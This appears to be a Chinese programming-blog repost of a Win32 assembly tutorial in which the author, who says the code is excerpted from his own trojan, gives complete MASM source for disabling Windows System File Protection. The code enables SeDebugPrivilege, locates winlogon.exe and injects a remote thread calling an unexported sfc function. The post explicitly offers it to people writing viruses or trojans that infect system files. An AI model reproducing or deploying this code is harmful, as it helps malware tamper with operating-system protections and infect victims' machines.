汇编代码之关闭系统文件保护

2023-11-04 04:48
文章标签 代码 保护 汇编 关闭系统

本文主要是介绍汇编代码之关闭系统文件保护,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

对于写一些感染系统文件的病毒或木马时,那个"系统文件保护"好象满让人讨厌的,下面给大家一个关闭系统文件保护汇编例子[摘自我个人所写的"冰马"],希望对和我一样初学win32汇编的新手有点帮助!

[转载请保留出处]

作者:冰狐浪子 [http://www.icyfoxlovelace.com]

代码共分四个部分

关闭系统文件保护例子.asm

    .386
    .model flat, stdcall
    option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include    windows.inc
include    user32.inc
includelib  user32.lib
include    kernel32.inc
includelib  kernel32.lib

include    advapi32.inc
includelib  advapi32.lib

    .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;冰狐浪子作品代码节选
include    关闭文件保护.asm
Fsb  db  "无法关闭文件保护!",0
Fcg  db  "成功关闭文件保护!",0

start:
  call  _Sfcoff    ;关闭文件保护

  .if eax
    invoke  MessageBox,NULL,offset Fcg,offset Fcg,MB_OK
  .else
    invoke  MessageBox,NULL,offset Fsb,offset Fsb,MB_OK
  .endif
ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    end  start
提升权限.asm
;提升权限,获得在系统进程中插入代码的权限
;冰狐浪子作品代码节选
;include  advapi32.inc
;includelib  advapi32.lib

SE_DEBUG_NAME_Y  db "SeDebugPrivilege",0

_EnableDebugPrivilege  proc
      local  @hToken
      local  @tp:TOKEN_PRIVILEGES

  invoke  GetCurrentProcess

  lea  ecx,@hToken
  invoke  OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES,ecx  ;addr @hToken

  mov  @tp.PrivilegeCount,1
  invoke  LookupPrivilegeValue,NULL,addr SE_DEBUG_NAME_Y,addr @tp.Privileges[0].Luid
  mov  @tp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
  invoke  AdjustTokenPrivileges,@hToken,FALSE,addr @tp,sizeof @tp,NULL,NULL
  push  eax
  invoke  CloseHandle,@hToken
  pop  eax
  ret

_EnableDebugPrivilege  endp
查找进程.asm
;根据程序名,查找进程id
;冰狐浪子作品代码节选
;include  kernel32.inc
;includelib  kernel32.lib
;  例:
;  namePr  db  "EXPLORER.EXE",0
;  ............
;  invoke  _findProcess,offset namePr
;  .if eax
;  找到
;  .else
;  没找到
;  .endif


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;清零
_ZeroMemory  proc  _lpDest,_dwSize
    
    push  edi
    cld
;push  _lpDest
    mov  edi,_lpDest
    mov  ecx,_dwSize
    xor  eax,eax

    rep  stosb
;pop  eax
    pop  edi
    ret

_ZeroMemory  endp

;计算字符串长度(带尾部的0)
_lstrlen  proc  _lpString
    push  edi
    cld
    mov  edi,_lpString
    mov  ecx,-1
    xor  al,al
    repnz  scasb
    mov  eax,edi
    sub  eax,_lpString
    pop  edi
    ret
_lstrlen  endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;;查找进程id  参数:@ProcessName指向进程名的大写字符串地址
;;eax=返回的id(eax=0表示没找到)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_findProcess  proc  @ProcessName
    local  @StringLength    ;@ProcessName指向的字符串长度
    ;用于获取进程
    local  @hSnapShot
    local  @stProcess:PROCESSENTRY32

;********************************************************************
; 计算传入 进程名 字符串的长度(带尾部的0)
;********************************************************************

    invoke  _lstrlen,@ProcessName
    mov  @StringLength,eax

    invoke  _ZeroMemory,addr @stProcess,sizeof @stProcess
    mov  @stProcess.dwSize,sizeof @stProcess
    invoke  CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
    mov  @hSnapShot,eax

    invoke  Process32First,@hSnapShot,addr @stProcess
    .while  eax
      lea  esi,@stProcess.szExeFile
      push  esi
      mov  edi,esi
;变为大写字母
      _nextz:
      lodsb
      cmp  al,60h
      jc  @F 
      cmp  al,7Bh
      ja  @F
      and  al,not 20h
@@:      STOSB

      cmp  al,"/"
      jnz  @F
      pop  ecx  ;保存的esi出栈,无用
      push  esi
@@:
      or  al,al
      jne  _nextz

      mov  ecx,@StringLength    ;字符串比较
      pop  esi
      mov  edi,@ProcessName
      repz  cmpsb

      .if  ZERO?  ;找到了同名进程(ZF=1)
        mov eax,@stProcess.th32ProcessID
        jmp  @F
      .endif

      invoke  Process32Next,@hSnapShot,addr @stProcess
    .endw
    push eax
    invoke  CloseHandle,@hSnapShot
    pop eax
@@:    ret
_findProcess  endp


关闭文件保护.asm
;冰狐浪子作品代码节选
include    提升权限.asm
include    查找进程.asm

namePr  db  "WINLOGON.EXE",0
sfc_2000  db  'sfc.dll',0
sfc_xp    db  'sfc_os.dll',0

;关闭文件保护
_Sfcoff  proc
  local  @hSfc
    local  @hProcess
    invoke  _EnableDebugPrivilege    ;提升权限
    invoke  _findProcess,offset namePr  ;查找进程
    invoke  OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION,FALSE,eax
;PROCESS_ALL_ACCESS
    .if  eax
      mov  @hProcess,eax    ;进程句柄
      invoke  LoadLibrary,offset sfc_2000
      .if !eax
        invoke  LoadLibrary,offset sfc_xp
      .endif
  mov  @hSfc,eax
      invoke  GetProcAddress,eax,2
  push  eax
  invoke  FreeLibrary,@hSfc
  pop  eax
      .if eax
        xor  ecx,ecx
        invoke  CreateRemoteThread,@hProcess,ecx,ecx,eax,ecx,ecx,ecx
        .if  eax
          invoke  CloseHandle,eax
          jmp @F
        .endif
      .endif
      invoke  CloseHandle,@hProcess    ;关闭进程句柄
    .endif
    xor eax,eax
@@:    ret
_Sfcoff  endp

这篇关于汇编代码之关闭系统文件保护的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/343331

相关文章

Nginx服务器部署详细代码实例

Nginx服务器部署详细代码实例

《Nginx服务器部署详细代码实例》Nginx是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务,:本文主要介绍Nginx服务器部署的相关资料,文中通过代码... 目录Nginx 服务器SSL/TLS 配置动态脚本反向代理总结Nginx 服务器Nginx是一个‌高性
阅读更多...
HTML5的input标签的`type`属性值详解和代码示例

HTML5的input标签的`type`属性值详解和代码示例

《HTML5的input标签的`type`属性值详解和代码示例》HTML5的`input`标签提供了多种`type`属性值,用于创建不同类型的输入控件,满足用户输入的多样化需求,从文本输入、密码输入、... 目录一、引言二、文本类输入类型2.1 text2.2 password2.3 textarea(严格
阅读更多...
JAVA项目swing转javafx语法规则以及示例代码

JAVA项目swing转javafx语法规则以及示例代码

《JAVA项目swing转javafx语法规则以及示例代码》:本文主要介绍JAVA项目swing转javafx语法规则以及示例代码的相关资料,文中详细讲解了主类继承、窗口创建、布局管理、控件替换、... 目录最常用的“一行换一行”速查表(直接全局替换)实际转换示例(JFramejs → JavaFX)迁移建
阅读更多...
Go异常处理、泛型和文件操作实例代码

Go异常处理、泛型和文件操作实例代码

《Go异常处理、泛型和文件操作实例代码》Go语言的异常处理机制与传统的面向对象语言(如Java、C#)所使用的try-catch结构有所不同,它采用了自己独特的设计理念和方法,:本文主要介绍Go异... 目录一:异常处理常见的异常处理向上抛中断程序恢复程序二:泛型泛型函数泛型结构体泛型切片泛型 map三:文
阅读更多...
MyBatis中的两种参数传递类型详解(示例代码)

MyBatis中的两种参数传递类型详解(示例代码)

《MyBatis中的两种参数传递类型详解(示例代码)》文章介绍了MyBatis中传递多个参数的两种方式,使用Map和使用@Param注解或封装POJO,Map方式适用于动态、不固定的参数,但可读性和安... 目录✅ android方式一:使用Map<String, Object>✅ 方式二:使用@Param
阅读更多...
SpringBoot实现图形验证码的示例代码

SpringBoot实现图形验证码的示例代码

《SpringBoot实现图形验证码的示例代码》验证码的实现方式有很多,可以由前端实现,也可以由后端进行实现,也有很多的插件和工具包可以使用,在这里,我们使用Hutool提供的小工具实现,本文介绍Sp... 目录项目创建前端代码实现约定前后端交互接口需求分析接口定义Hutool工具实现服务器端代码引入依赖获
阅读更多...
利用Python在万圣节实现比心弹窗告白代码

利用Python在万圣节实现比心弹窗告白代码

《利用Python在万圣节实现比心弹窗告白代码》:本文主要介绍关于利用Python在万圣节实现比心弹窗告白代码的相关资料,每个弹窗会显示一条温馨提示,程序通过参数方程绘制爱心形状,并使用多线程技术... 目录前言效果预览要点1. 爱心曲线方程2. 显示温馨弹窗函数(详细拆解)2.1 函数定义和延迟机制2.2
阅读更多...
Springmvc常用的注解代码示例

Springmvc常用的注解代码示例

《Springmvc常用的注解代码示例》本文介绍了SpringMVC中常用的控制器和请求映射注解,包括@Controller、@RequestMapping等,以及请求参数绑定注解,如@Request... 目录一、控制器与请求映射注解二、请求参数绑定注解三、其他常用注解(扩展)四、注解使用注意事项一、控制
阅读更多...
C++简单日志系统实现代码示例

C++简单日志系统实现代码示例

《C++简单日志系统实现代码示例》日志系统是成熟软件中的一个重要组成部分,其记录软件的使用和运行行为,方便事后进行故障分析、数据统计等,:本文主要介绍C++简单日志系统实现的相关资料,文中通过代码... 目录前言Util.hppLevel.hppLogMsg.hppFormat.hppSink.hppBuf
阅读更多...
VS Code中的Python代码格式化插件示例讲解

VS Code中的Python代码格式化插件示例讲解

《VSCode中的Python代码格式化插件示例讲解》在Java开发过程中,代码的规范性和可读性至关重要,一个团队中如果每个开发者的代码风格各异,会给代码的维护、审查和协作带来极大的困难,这篇文章主... 目录前言如何安装与配置使用建议与技巧如何选择总结前言在 VS Code 中,有几款非常出色的 pyt
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2